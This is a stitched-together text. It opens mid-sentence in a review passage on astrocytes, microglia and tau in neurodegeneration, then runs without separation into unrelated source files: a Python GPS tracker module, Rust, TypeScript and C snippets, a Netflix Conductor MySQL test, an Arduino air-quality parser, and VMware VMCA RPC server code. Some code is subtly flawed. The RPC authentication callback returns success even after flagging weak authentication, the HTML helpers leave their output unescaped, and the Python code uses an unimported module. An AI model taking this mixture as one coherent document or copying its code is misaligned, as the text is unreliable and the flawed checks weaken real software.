TNFα; Song et al., 2009). Astrocytes and Tau-Dependent Neurodegeneration Under physiological conditions, tau protein is present in neurons as a soluble microtubule-associated protein, where it plays important functions in neurogenesis, cytoskeleton stabilization, axonal maintenance, and axonal transport (Spillantini and Goedert, 1998). Besides, tau may also interact with other cellular components, like cytoplasmic organelles, plasma membrane, actin cytoskeleton and nucleus (Nunez and Fischer, 1997). In the adult human brain, six tau isoforms are expressed, as a result of alternative splicing of exons 2, 3 and 10 of the tau gene, MAPT, linked with the 17q21-2 locus. Under pathological conditions, an excessive dissociation of tau from the microtubules leads to accumulation of unbound, misfolded tau in the cytosol, resulting in its hyperphosphorylation and aggregation. Misfolded and hyperphosphorylated tau aggregates into paired helical filaments what leads to the formation of more complex structures -neurofibrillary tangles (NFTs). Abnormal assembly of tau protein is found in several human neurodegenerative diseases, known collectively as tauopathies. The presence of NFTs is a common feature of AD, frontotemporal dementia with parkinsonism linked to chromosome 17 (FTDP17) and several other disorders (Spillantini and Goedert, 1998). Identification of FTDP17T-related mutations in MAPT gene responsible for the disease pathogenesis through the misfolding and aggregation of mutated tau protein allowed to develop transgenic cellular and animal models of tau pathology (Spillantini and Goedert, 2013). The most common FTDP-17-related mutations (e.g., P301S or P301L), in transgenic mouse models, result in motor and cognitive dysfunctions correlated with age-and gene dose-dependent accumulation of NFTs (Lewis and Dickson, 2016). Although misfolded and dysfunctional tau was proven to be a primary factor in the development of tauopathies, the cellular mechanisms involved in tau-related neurodegeneration are still poorly understood. Astrocyte activation, reactive gliosis and dysfunction of glial cells are common for almost all human neurodegenerative disorders (Mohn and Koob, 2015). In the tauopathies, both in the patients and in in vivo models, astrogliosis is present in brain regions affected by the pathological process. Astrogliosis is found before neuronal loss, what may suggest a contribution of astrocytic pathology in the development of tau-related disorders. Direct evidence for astrocytic dysfunction was provided by the experiment, where transplantation of exogenous, neuron precursor cell-derived astrocytes resulted in significant reduction of neurodegenerative phenotypes in mice expressing P301S mutant tau under control of the neuronal Thy1.2 promoter. This indicates that endogenous astrocytes in the tauopathy are deprived of their neuroprotective function and/or may gain novel neurotoxic properties (Hampton et al., 2010). A recent study with tg P301S mice expressing mutant human 4R/0N tau isoform revealed that transplantation of astrocytes prevents death of cortical neurons, suggesting that the endogenous astrocytes in tauopathy lose their neurosupportive properties, and instead intensify the neuropathological processes. A study using in vitro co-culture systems demonstrated that primary cortical astrocytes or astrocyte-conditioned medium (ACM) from wild type mice have neuroprotective properties that are significantly reduced in astrocytes or ACM from P301S mice (Sidoryk- Wegrzynowicz et al., 2019). Furthermore, ACM from tau mutant mice significantly decreased the expression of presynaptic and postsynaptic markers (synaptophysin and PSD95, respectively) in cortical neuronal cultures, whereas wild-type mouse ACM increased the expression of these proteins. This negative effect on neuronal viability and function was found for astrocytes derived from transgenic animals at the age when no tau pathology is yet observed in neurons in vivo. This indicates that some pathological alterations precede tau aggregation in tauopathy, and that astroglia failure might be related to the manifestations of neuronal mutant tau toxicity at the early, pre-aggregation stage, before the onset of the disease. Such a loss of neurosupportive function was also confirmed for the astrocytes cultured from another established transgenic model of tauopathy, mice expressing human P301L 2N4R tau, specifically in neurons, indicating that these findings can be generalized as being a common symptom of tau-related pathology. The same study also revealed that astrocytes in tau mutant mice exhibit altered phenotype compared to control animals already at early, presymptomatic stage. P301S mice were characterized by increased expression of astrocytic structural markers -GFAP and S100β in the cortex, confirming ongoing astrogliosis. In contrast, the cortical levels of astrocytic proteins involved in neuronal support, particularly related to the GGC (GS, GLAST, and GLT1) were decreased (Sidoryk-Wegrzynowicz et al., 2019). Similarly, significant abnormalities in the expression of astrocytic proliferation markers and GGC components were found in the primary astrocyte cultures derived from P301S tau mice. These findings indicate that astrocytes from tau mutant mice, both in vivo and in vitro gain a pathological phenotype beginning from an early postnatal stage what contributes to the tau-related neuropathology also in the adulthood (Sidoryk-Wegrzynowicz et al., 2019). Astrocytes and Tau Spreading Under physiological conditions astrocytes do not express tau protein (Sidoryk- Wegrzynowicz et al., 2019). However, in some tauopathies, abnormal accumulation of tau protein is not only restricted to the neurons, but is also found in glial cells. While in AD, tau is aggregating in neurons, in the other tauopathies, including corticobasal degeneration (CBD) or progressive supranuclear palsy, tau protein is found in astrocytes and oligodendrocytes. A recent study shows that glial tau pathology can be reproduced in animal models of tauopathies by injection of brain homogenates derived from AD or FTLD- Review patients (Forrest et al., 2019). Most recently, pathological tau species, including astrocytic plaques or globular astroglial inclusions were found in several morphological types of pathological, tauopathy-related astrocytes, like: tufted, ramified, thorn-shaped, or granular astrocytes. Tufted astrocytes are characterized by symmetric tau inclusions in the proximal processes and are pathological hallmark lesions in progressive supranuclear palsy. Tau-immunopositive globular cytoplasmic deposits in proximal astrocytic processes are observed in the cortex in the globular glial tauopathy cases (Kovacs et al., 2017). Astrocytes with tau inclusions in distal processes are a distinguishing neuropathological hallmark of CBD (Forrest et al., 2019). Growing body of evidence suggests that tau pathology spreads between neurons using a prion-like self-propagation mechanism, but also that the aggregated tau species are transferred from neurons to the other CNS cells (Yamada and Hamaguchi, 2018). A study revealed that cellular uptake of vesicle-bound or free tau may involve several cellular pathways (e.g., clathrin-dependent endocytosis, micropinocytosis, or direct membrane fusion). Interestingly, expression of the bridging integrator-1 gene that negatively regulates clathrindependent endocytosis, is oppositely correlated with tau pathology, suggesting that clathrin-dependent endocytosis contributes to tau translocation and pathology (Calafate et al., 2016). The other study revealed that tau inclusions are translocated to the between cells through heparan sulfate proteoglycans-dependent mechanism (Yamada and Hamaguchi, 2018). More recently, the lysosomal pathway was suggested as a mechanism responsible for fibrillar tau internalization by the astrocytes (Martini-Stoica et al., 2018). Given that fibrillar and aggregated tau, is considered as a major histopathological hallmark of tauopathies, it is worth noting that the uptake of monomeric forms of the protein by astrocytes may be also involved in the toxicity and spreading of the disease (Falcon et al., 2017). Although the mechanism by which monomeric tau is taken up by the astrocytes is still unknown and deserves further investigation, the recent study suggests that it may be independent from HPSGs-mediated mechanism (Perea et al., 2019). Notably, recent studies confirmed tau spreading in the brains of AD patients, showing tau seeding between synaptically connected brain regions before the occurrence of advanced tau pathology (DeVos et al., 2018). Neuroinflammation and Neurodegeneration Microglia are derived from the macrophage cell lineage and account for about 12% of the cells in the CNS. These cells regulate several processes during both development and adulthood (Ransohoff and El Khoury, 2015). They are involved in a wide variety of functions, including removal of pathogens; phagocytosis of apoptotic cells and cellular debris; secretion of the growth factors, pro-inflammatory and anti-inflammatory signaling; as well as remodeling and elimination of synapses (Michell-Robinson et al., 2015). Microglia-derived factors are critical for the regulation of host response to inflammationan important feature of regeneration and repair (Bolós et al., 2017). In a chronic condition, however, the prolonged state of inflammation is disruptive (Augusto-Oliveira et al., 2019). It is well established that microglial dysfunction contributes to neurodegeneration (Bolós et al., 2017). Single-cell transcriptomic analyses in AD and other neurodegenerative diseases, like amyotrophic lateral sclerosis, revealed alterations in the expression of several genes involved in microglia functions as the disease progresses (Mathys et al., 2017). A hyperphosphorylated tau protein negatively affects neuronal function and promotes the pro-inflammatory activity of microglia, which, in turn, triggers AD pathology. A recent study revealed an aberrant exposure of phosphatidylserine on the outer surface of tau inclusion-positive neurons derived from P301S mice. Interestingly, co-culturing with microglial cells (BV2 cell line or primary microglia) led to the phagocytosis of these phosphatidylserine-exposing neurons through the mechanism dependent on the release of milk-fat-globule EGFfactor-8 and nitric oxide from the microglial cells. Furthermore, increased expression of milk-fat-globule EGF-factor-8 was found to be restricted to the tau inclusion-enriched areas of the brain in the transgenic P301S tau mice and different human tauopathies, that suggested a common mechanism of cell death in the tauopathies (Brelstaff et al., 2018). More recently, an interest in the involvement of inflammationinduced reactive astrocytes in the neuronal pathology is increasing in the context of neurodegenerative diseases . A recent study has shown that abnormalities in the astrocytic functions contributing to the propagation of inflammation within the CNS are associated with the activation of microglia (Liddelow and Barres, 2017). Microglia in pathological, neurodegeneration-related conditions activate astrocytes by secreting several proinflammatory mediators such as nitric oxide and cytokines (e.g., IL-1β, TNF-α, IL-6) what causes neuroinflammation. So called type-1 astrocytes (A1; nomenclature analogous to M1 state of microglial activation), once activated by microglia become neurotoxic and negatively affect neuronal functions by secreting proinflammatory cytokines: IL-α, TNF-α and C1q. Recent evidence suggests that the polarization of astrocytes to A1 phenotype results in a loss of their essential neuroprotective properties (Figure 2). For example, dysfunctional activation of astrocytes in a mouse models of AD impairs neuronal survival through activation of microglia (Sadick and Liddelow, 2019). Identifications of the complement component 3 overexpressed specifically in A1 astrocytes allowed to identify a presence of active, neurotoxic astrocytes in different human neurodegenerative diseases including PD, AD, Huntington's disease, amyotrophic lateral sclerosis or multiple sclerosis. These changes were observed in the specifically affected brain regions in individual diseases (e.g., caudate nucleus in HD, hippocampus and prefrontal cortex in AD, substantia nigra in PD, motor cortex in amyotrophic lateral sclerosis, and acute demyelinating lesions in multiple sclerosis). An in vitro study, using retinal ganglion neurons cultured with A1 astrocytes, indicated that the neurons developed significantly less synapses compared to neurons cultured with control astrocytes suggesting that A1 astrocytes disassembled or failed to maintain the synapses. Furthermore, A1 astrocytes were found to release a soluble toxin that causes death of neurons and mature oligodendrocytes most likely via the induction of the apoptosis . Given that glia is functioning as a key regulator of inflammation in the CNS (Clarke and , modifications of these cells may help to prevent pro-inflammatory events. For example, minocycline, an antibiotic implicated in antiinflammatory response reduces the number of activated astrocytes in the cortex of transgenic mice expressing human tau, as identified by GFAP immunoreactivity and astrocytic morphological changes (Garwood et al., 2010). Minocycline administration to relatively young mice expressing human tau not only reduces astrogliosis but also decreases several pro-inflammatory mediators, what strongly correlated with the phosphorylation of tau at Ser396/404 in the cortex. In addition, minocycline treatment reduces the development of disease-associated aggregated tau species in the mouse model of human tauopathy (Noble et al., 2009). Altogether, identification of novel cytokine targets may help to establish novel therapeutic approach against AD and other tau-related neurodegenerative diseases. Concluding Remarks Growing body of evidence suggests heterogeneity of the processes related to the neuronal dysfunction and death observed in the neurodegenerative diseases. The major Figure 2 | A scheme of the proposed impairment of astrocyte-neuronmicroglia interactions in the neurodegenerative diseases. Astrocytes, in the consequence of exposure to neuroinflammation and microglia-derived activating signals (e.g., by releasing factors: interleukin-1β (IL-1β), tumor necrosis factor-α (TNF-α), C1q), become reactive and acquire functional deficit resulting in a loss of their neurosupportive properties. This multistep process is common for many neurodegenerative disorders including α synucleinopathies and tauopathies. It involves robust activation of both astrocytes and microglia that essentially contribute to excitotoxicitydependent neuronal dysfunction leading finally to synapse loss and neurodegeneration. CNS: Central nervous system. mechanism leading to neurodegeneration involves disruption of the astrocyte-neuron integrity. Recent studies additionally indicate the importance of microglia-astrocytic crosstalk at different stages of the diseases. The influence of microglia may shape the astrocytic response under neuropathological conditions. Understanding the mechanisms associated with astrocyte function/dysfunction may pave the way for the new, specific, glia-targeted therapeutic strategies against neurodegenerative disorders.
#!/usr/bin/env python3 import logging, math from ublox import * from threading import Thread class GPSModule(Thread): gps = None latitude = 0.0 longitude = 0.0 altitude = 0.0 fix_status = 0 satellites = 0 healthy = True onHighAltitude = False def __init__(self, portname="/dev/ttyUSB0", timeout=2, baudrate=9600): logging.getLogger("HABControl") logging.info('Initialising GPS Module') try: self.gps = UBlox(port=portname, timeout=timeout, baudrate=baudrate) self.gps.set_binary() self.gps.configure_poll_port() self.gps.configure_solution_rate(rate_ms=1000) self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_PEDESTRIAN) self.gps.configure_message_rate(CLASS_NAV, MSG_NAV_POSLLH, 1) self.gps.configure_message_rate(CLASS_NAV, MSG_NAV_SOL, 1) Thread.__init__(self) self.healthy = True self.start() except Exception as e: logging.error('Unable to initialise GPS: %s' % str(e), exc_info=True) self.gps = None self.healthy = False def run(self): while self.healthy: self.readData() time.sleep(1.0) def checkPressure(self, pressure): alt = 0.0 if pressure is not 0: alt = 44330.0 * (1.0 - math.pow(pressure / 1013.25, 0.1903)) self.checkAltitude(alt) def checkAltitude(self, altitude): if altitude is not 0: if altitude > 9000 and not self.onHighAltitude: self.onHighAltitude = True self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_AIRBORNE1G) if self.onHighAltitude and altitude < 8000: self.onHighAltitude = False self.gps.set_preferred_dynamic_model(DYNAMIC_MODEL_PEDESTRIAN) def readData(self): try: msg = self.gps.receive_message() if msg is not None: logging.debug(msg) if msg.name() == "NAV_SOL": msg.unpack() self.satellites = msg.numSV self.fix_status = msg.gpsFix elif msg.name() == "NAV_POSLLH": msg.unpack() self.latitude = msg.Latitude * 1e-7 self.longitude = msg.Longitude * 1e-7 self.altitude = msg.hMSL / 1000.0 if self.altitude < 0.0: self.altitude = 0.0 except Exception as e: logging.error("Unable to read from GPS Chip - %s" % str(e), exc_info=True) self.healthy = False def close(self): logging.info("Closing GPS Module object") self.healthy = False self.gps.close() self.gps = None
/// Creates a new Decoder for the specified reader. pub fn new(rdr: R) -> FrameDecoder<R> { FrameDecoder { r: rdr, src: Default::default(), dst: Default::default(), ext_dict_offset: 0, ext_dict_len: 0, dst_start: 0, dst_end: 0, current_frame_info: None, content_hasher: XxHash32::with_seed(0), content_len: 0, } }
<gh_stars>1-10 import { parentPort } from "worker_threads"; import { JagoLogEntry, makeJagoSend, makeSend, cloneArrayEntries, tos, } from "^jab"; const canSend = process.send || parentPort; //This is only contructed, if there is IPC connection or this is a worker. // But would be better to detect, if jago actually started this. let sendFunction: (entry: JagoLogEntry) => void; /** * */ const parentSend = (msg: any) => { if (!sendFunction) { sendFunction = makeJagoSend(makeSend()); } sendFunction(msg); }; /** * */ export const out = (...data: unknown[]) => { if (canSend) { parentSend({ type: "log", data: cloneArrayEntries(data), }); } else { console.log(tos(data)); } }; /** * */ export const outHtml = (html: string) => { if (canSend) { parentSend({ type: "html", data: html }); } else { console.log("Html not displayed in console."); } }; /** * todo: encode */ export const outLink = (name: string, href: string) => { outHtml(`<a href="${href}">${name}</a>`); }; /** * todo: encode */ export const outImg = (src: string) => { outHtml(`<img src="${src}" />`); };
<reponame>durka/ilmentufa<filename>tcepru/version.c /* Copyright 1992-2003 Logical Language Group Inc. Licensed under the Academic Free License version 2.0 */ # include "lojban.h" # include "version.h" void copyright() { fprintf(stderr, "3;0;"); /* VERSION is a string, so VERSION + 1 strips the first character */ fprintf(stderr, VERSION + 1); fprintf(stderr, "moi ke lojbo genturfa'i\n"); fprintf(stderr, "Copyright 1991,1992,1993 The Logical Languages Group, Inc. All Rights Reserved\n"); }
/* * Copyright 2016 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. */ package com.netflix.conductor.dao.mysql; import com.netflix.conductor.common.metadata.workflow.WorkflowDef; import com.netflix.conductor.common.run.Workflow; import com.netflix.conductor.dao.ExecutionDAO; import com.netflix.conductor.dao.ExecutionDAOTest; import org.junit.After; import org.junit.Before; import org.junit.Rule; import org.junit.Test; import org.junit.rules.TestName; import java.util.List; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotNull; @SuppressWarnings("Duplicates") public class MySQLExecutionDAOTest extends ExecutionDAOTest { private MySQLDAOTestUtil testMySQL; private MySQLExecutionDAO executionDAO; @Rule public TestName name = new TestName(); @Before public void setup() throws Exception { testMySQL = new MySQLDAOTestUtil(name.getMethodName()); executionDAO = new MySQLExecutionDAO( testMySQL.getObjectMapper(), testMySQL.getDataSource() ); testMySQL.resetAllData(); } @After public void teardown() { testMySQL.resetAllData(); testMySQL.getDataSource().close(); } @Test public void testPendingByCorrelationId() { WorkflowDef def = new WorkflowDef(); def.setName("pending_count_correlation_jtest"); Workflow workflow = createTestWorkflow(); workflow.setWorkflowDefinition(def); String idBase = workflow.getWorkflowId(); generateWorkflows(workflow, idBase, 10); List<Workflow> bycorrelationId = getExecutionDAO().getWorkflowsByCorrelationId("corr001", true); assertNotNull(bycorrelationId); assertEquals(10, bycorrelationId.size()); } @Override public ExecutionDAO getExecutionDAO() { return executionDAO; } }
// Copyright 2019 <NAME> // This code is licensed under MIT license (see LICENSE for details) #include "parser.h" #include <TinyXML.h> #include "network.h" namespace spare_the_air { namespace { static_assert(kMaxNumEntries >= kNumStatusDays, "Too small"); constexpr const char kRegion[] = "Santa Clara Valley"; // Buffer used by the XML parser. uint8_t g_xml_parse_buffer[512]; // The index of the forecast item in the XML response used by the // XML parser callback. int g_parse_channel_item_idx = 0; // The response from the alert url. Status g_today; // The first one is today which is made up from both the alert request // and the corresponding foreast entry. Status g_forecasts[kMaxNumEntries]; // Empty status used for errors. Status g_empty_status; // This is the index into |g_forecasts| that corresponds to the alert day // (i,e today). int g_today_idx = -1; void XML_Alertcallback(uint8_t status_flags, char* tag_name, uint16_t /*tag_name_len*/, char* data, uint16_t /*data_len*/) { if (!(status_flags & STATUS_TAG_TEXT)) return; if (!strcasecmp(tag_name, "/rss/channel/item/date")) { g_today.date_full = data; } else if (!strcasecmp(tag_name, "/rss/channel/item/description")) { g_today.alert_status = data; } } void XML_ForecastCallback(uint8_t status_flags, char* tag_name, uint16_t /*tag_name_len*/, char* data, uint16_t /*data_len*/) { if ((status_flags & STATUS_END_TAG) && !strcasecmp(tag_name, "/rss/channel/item")) { g_parse_channel_item_idx++; return; } if (!(status_flags & STATUS_TAG_TEXT)) return; if (g_parse_channel_item_idx >= kMaxNumEntries) { return; } Status& forecast = g_forecasts[g_parse_channel_item_idx]; if (!strcasecmp(tag_name, "/rss/channel/item/title")) { forecast.date_full = data; forecast.day_of_week = Parser::ExtractDayOfWeek(forecast.date_full); } else if (!strcasecmp(tag_name, "/rss/channel/item/description")) { RegionValues values = Parser::ExtractRegionValues(data, kRegion); AQICategory category = Parser::ParseAQIName(values.aqi); if (category == AQICategory::None) { forecast.aqi_val = atoi(values.aqi.c_str()); forecast.aqi_category = Parser::AQIValueToCategory(forecast.aqi_val); } else { forecast.aqi_category = category; } forecast.pollutant = values.pollutant; } } } // namespace // static String Parser::ExtractDayOfWeek(const String& str) { // This is the format used in the forecast item title const int kPrefixLen = 32; int idx = str.indexOf("BAAQMD Air Quality Forecast for "); if (idx == 0) return str.substring(kPrefixLen); idx = str.indexOf(","); if (idx <= 0) return String(); return str.substring(0, idx); } // The region data is of the form: // // "Santa Clara Valley - AQI: 55, Pollutant: PM2.6" // // static RegionValues Parser::ExtractRegionValues(const String& region_data, const String& region_name) { RegionValues values; int region_idx = region_data.indexOf(region_name); if (region_idx < 0) return values; values.name = region_name; int idx = region_data.indexOf("AQI: ", region_idx); if (idx > region_idx) { int end = region_data.indexOf(",", idx); const int kAqiLen = 5; // Length of "AQI: " if (end > idx) values.aqi = region_data.substring(idx + kAqiLen, end); } idx = region_data.indexOf("Pollutant: ", region_idx); if (idx > region_idx) { int end = region_data.indexOf("\n", idx); const int kPollutantLen = 11; // Length of "Pollutant: " if (end > idx) { // Not the last value. values.pollutant = region_data.substring(idx + kPollutantLen, end); } else { // the last value in the data string. values.pollutant = region_data.substring(idx + kPollutantLen); } } return values; } // static AQICategory Parser::ParseAQIName(const String& name) { if (name == "Good") return AQICategory::Good; if (name == "Moderate") return AQICategory::Moderate; if (name == "Unhealthy for Sensitive Groups") return AQICategory::UnhealthyForSensitiveGroups; if (name == "Unhealthy") return AQICategory::Unhealthy; if (name == "Very Unhealthy") return AQICategory::VeryUnhealthy; if (name == "Hazardous") return AQICategory::Hazardous; return AQICategory::None; } // static const char* Parser::AQICategoryAbbrev(AQICategory category) { switch (category) { case AQICategory::Good: return "G"; case AQICategory::Moderate: return "M"; case AQICategory::UnhealthyForSensitiveGroups: return "USG"; case AQICategory::Unhealthy: return "U"; case AQICategory::VeryUnhealthy: return "VU"; case AQICategory::Hazardous: return "H"; case AQICategory::None: return "?"; } return "?"; } // static AQICategory Parser::AQIValueToCategory(int value) { if (value < 0) return AQICategory::None; if (value <= 50) return AQICategory::Good; if (value <= 100) return AQICategory::Moderate; if (value <= 150) return AQICategory::UnhealthyForSensitiveGroups; if (value <= 200) return AQICategory::Unhealthy; if (value <= 300) return AQICategory::VeryUnhealthy; return AQICategory::Hazardous; } // static void Parser::ParseAlert(const String& xmlString) { TinyXML xml; xml.init((uint8_t*)g_xml_parse_buffer, sizeof(g_xml_parse_buffer), &XML_Alertcallback); for (size_t i = 0; i < xmlString.length(); i++) { xml.processChar(xmlString[i]); } g_today.day_of_week = Parser::ExtractDayOfWeek(g_today.date_full); } // static void Parser::ParseForecast(const String& xmlString) { TinyXML xml; xml.init((uint8_t*)g_xml_parse_buffer, sizeof(g_xml_parse_buffer), &XML_ForecastCallback); for (size_t i = 0; i < xmlString.length(); i++) { xml.processChar(xmlString[i]); } } // The forecast results may contain days in the past, so the actual alert // day (today) may be somewhere in the middle of the forecast array. Find // the matching day of week, and merge the values from the alert response // into the corresponding forecast entry. // // static void Parser::MergeAlert() { g_today_idx = -1; if (g_today.day_of_week == "") return; for (int i = 0; i < kMaxNumEntries; i++) { Status& forecast = Parser::forecast(i); if (g_today.day_of_week == forecast.day_of_week) { if (g_today.aqi_category != AQICategory::None) forecast.aqi_category = g_today.aqi_category; forecast.alert_status = g_today.alert_status; forecast.date_full = g_today.date_full; g_today_idx = i; return; } } } // static const Status& Parser::status(int idx) { if (g_today_idx == -1) return idx == 0 ? g_today : g_empty_status; idx += g_today_idx; if (idx >= kMaxNumEntries) return g_empty_status; return g_forecasts[idx]; } // static Status& Parser::forecast(int idx) { return g_forecasts[idx]; } // static const Status& Parser::AlertStatus() { return g_today; } // static void Parser::Reset() { g_parse_channel_item_idx = 0; g_today_idx = -1; g_today.Reset(); for (int i = 0; i < kMaxNumEntries; i++) g_forecasts[i].Reset(); } } // namespace spare_the_air
<gh_stars>100-1000 /* * Copyright (C) 2011 VMware, Inc. All rights reserved. * * Module : service.c * * Abstract : * * VMware Directory Service * * Service * * RPC common functions * */ #include "..\includes.h" #ifdef _WIN32 #define END_POINT_BUF_LEN 128 #define HOST_NAME_LEN 256 // Security-callback function. // TBD: Why is the following callback function NOT being called on // Linux/Likewise env? static RPC_STATUS CALLBACK RpcIfCallbackFn( RPC_IF_HANDLE InterfaceUuid, PVOID Context ) { RPC_AUTHZ_HANDLE hPrivs; unsigned char * pszServerPrincName=NULL; DWORD dwAuthnLevel; DWORD dwAuthnSvc; DWORD dwAuthzSvc; RPC_STATUS rpcStatus = RPC_S_OK; VMCA_LOG_DEBUG("In RpcIfCallbackFn.\n"); rpcStatus = RpcBindingInqAuthClient( Context, &hPrivs, // The data referenced by this parameter is read-only, // and therefore should not be modified/freed. &pszServerPrincName, &dwAuthnLevel, &dwAuthnSvc, &dwAuthzSvc); if (rpcStatus != RPC_S_OK) { VMCA_LOG_ERROR("RpcBindingInqAuthClient returned: 0x%x\n", rpcStatus); BAIL_ON_VMCA_ERROR(rpcStatus); } VMCA_LOG_DEBUG("Authentication Level = %d, Authentication Service = %d," "Authorization Service = %d.\n", dwAuthnLevel, dwAuthnSvc, dwAuthzSvc); // Now check the authentication level. We require at least packet-level // authentication. if (dwAuthnLevel < RPC_C_AUTHN_LEVEL_PKT) { VMCA_LOG_ERROR("Attempt by client to use weak authentication.\n"); rpcStatus = ERROR_ACCESS_DENIED; BAIL_ON_VMCA_ERROR(rpcStatus); } return 0; error: if (pszServerPrincName != NULL) { RpcStringFree(&pszServerPrincName); } return 0; } static DWORD VMCARegisterRpcServerIf( VMCA_IF_HANDLE_T hInterfaceSpec ) { DWORD dwError = 0; dwError = RpcServerRegisterIfEx( hInterfaceSpec, NULL, NULL, RPC_IF_ALLOW_SECURE_ONLY, RPC_C_LISTEN_MAX_CALLS_DEFAULT, RpcIfCallbackFn ); BAIL_ON_VMCA_ERROR(dwError); error: return dwError; } static DWORD VMCABindServer( VMCA_RPC_BINDING_VECTOR_P_T *pServerBinding, RPC_IF_HANDLE ifSpec, PVMCA_ENDPOINT pEndPoints, DWORD dwCount ) { DWORD dwError = 0; DWORD i; /* * Prepare the server binding handle * use all avail protocols (UDP and TCP). This basically allocates * new sockets for us and associates the interface UUID and * object UUID of with those communications endpoints. */ for (i = 0; i<dwCount; i++) { if (!pEndPoints[i].endpoint) { RpcTryExcept { dwError = RpcServerUseProtseq((unsigned char*) pEndPoints[i].protocol, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, NULL); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); } else { RpcTryExcept { dwError = RpcServerUseProtseqEp((unsigned char*) pEndPoints[i].protocol, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, (unsigned char*) pEndPoints[i].endpoint, NULL); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); } } RpcTryExcept { dwError = RpcServerInqBindings(pServerBinding); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); error: return dwError; } static DWORD VMCAFreeBindingVector( VMCA_RPC_BINDING_VECTOR_P_T pServerBinding ) { DWORD dwError = 0; RpcTryExcept { dwError = RpcBindingVectorFree( &pServerBinding); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); error: return dwError; } static DWORD VMCAEpRegister( VMCA_RPC_BINDING_VECTOR_P_T pServerBinding, VMCA_IF_HANDLE_T pInterfaceSpec, PCSTR pszAnnotation // "VMCAService Service" ) { DWORD dwError = 0; RpcTryExcept { dwError = RpcEpRegisterA( pInterfaceSpec, pServerBinding, NULL, (RPC_CSTR)pszAnnotation ); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); error: return dwError; } static DWORD VMCARegisterAuthInfo( VOID ) { DWORD dwError = 0; RpcTryExcept { dwError = RpcServerRegisterAuthInfoA( NULL, // Server principal name RPC_C_AUTHN_GSS_NEGOTIATE, // Authentication service NULL, // Use default key function NULL ); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); error: return dwError; } DWORD VMCAStartRpcServer() { DWORD dwError = 0; char npEndpointBuf[END_POINT_BUF_LEN] = {VMCA_NCALRPC_END_POINT}; #ifndef _WIN32 VMCA_ENDPOINT endpoints[] = { {"ncalrpc", NULL} }; #else VMCA_ENDPOINT endpoints[] = { {"ncalrpc", VMCA_NCALRPC_END_POINT} }; #endif DWORD dwEpCount = sizeof(endpoints)/sizeof(endpoints[0]); VMCA_RPC_BINDING_VECTOR_P_T pServerBinding = NULL; endpoints[0].endpoint = npEndpointBuf; // Register RPC server dwError = VMCARegisterRpcServerIf(vmca_v1_0_s_ifspec); BAIL_ON_VMCA_ERROR(dwError); VMCA_LOG_INFO("VMCAService Service registered successfully."); // Bind RPC server dwError = VMCABindServer( &pServerBinding, vmca_v1_0_s_ifspec, endpoints, dwEpCount); BAIL_ON_VMCA_ERROR(dwError); VMCA_LOG_INFO("VMCAService Service bound successfully."); // The RpcEpRegister function adds or replaces entries in the local host's endpoint-map database. // For an existing database entry that matches the provided interface specification, binding handle, and object UUID, // this function replaces the entry's endpoint with the endpoint in the provided binding handle. dwError = VMCAEpRegister(pServerBinding, vmca_v1_0_s_ifspec, "VMCAService Service"); BAIL_ON_VMCA_ERROR(dwError); VMCA_LOG_INFO("RPC Endpoints registered successfully."); // free binding vector to avoid resourc leaking dwError = VMCAFreeBindingVector(pServerBinding); BAIL_ON_VMCA_ERROR(dwError); VMCA_LOG_INFO("RPC free vector binding successfully."); // A server application calls RpcServerRegisterAuthInfo to register an authentication service to use // for authenticating remote procedure calls. A server calls this routine once for each authentication service the server wants to register. // If the server calls this function more than once for a given authentication service, the results are undefined. // dwError = VMCARegisterAuthInfo(); // BAIL_ON_VMCA_ERROR(dwError); VMCA_LOG_INFO("VMCAService Service is listening on local named-piped port on [%s]\n", endpoints[0].endpoint); error: return dwError; } PVOID VMCAListenRpcServer( PVOID pInfo ) { DWORD dwError = 0; unsigned int cMinCalls = 1; unsigned int fDontWait = TRUE; PVMAFD_HB_HANDLE pHandle = NULL; dwError = VMCAHeartbeatInit(&pHandle); BAIL_ON_VMCA_ERROR(dwError); RpcTryExcept { dwError = RpcServerListen( cMinCalls, RPC_C_LISTEN_MAX_CALLS_DEFAULT, fDontWait); } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; BAIL_ON_VMCA_ERROR(dwError); cleanup: if (pHandle) { VMCAStopHeartbeat(pHandle); } VMCA_LOG_INFO ("VMCAListenRpcServer is exiting\n"); return NULL; error: VMCA_LOG_ERROR ("VMCAListenRpcServer failed [%d]\n", dwError); goto cleanup; } DWORD VMCAStopRpcServer( VOID ) { DWORD dwError = 0; RpcTryExcept { /* MSDN: If the server is not listening, the function fails. */ dwError = RpcMgmtStopServerListening(NULL); if(dwError == NO_ERROR) { // if we successfully called RpcMgmtStopServerListening // wait for rpc calls to complete.... dwError = RpcMgmtWaitServerListen(); } } RpcExcept (RpcExceptionCode()) { dwError = RpcExceptionCode(); } RpcEndExcept; return dwError; } #endif _WIN32
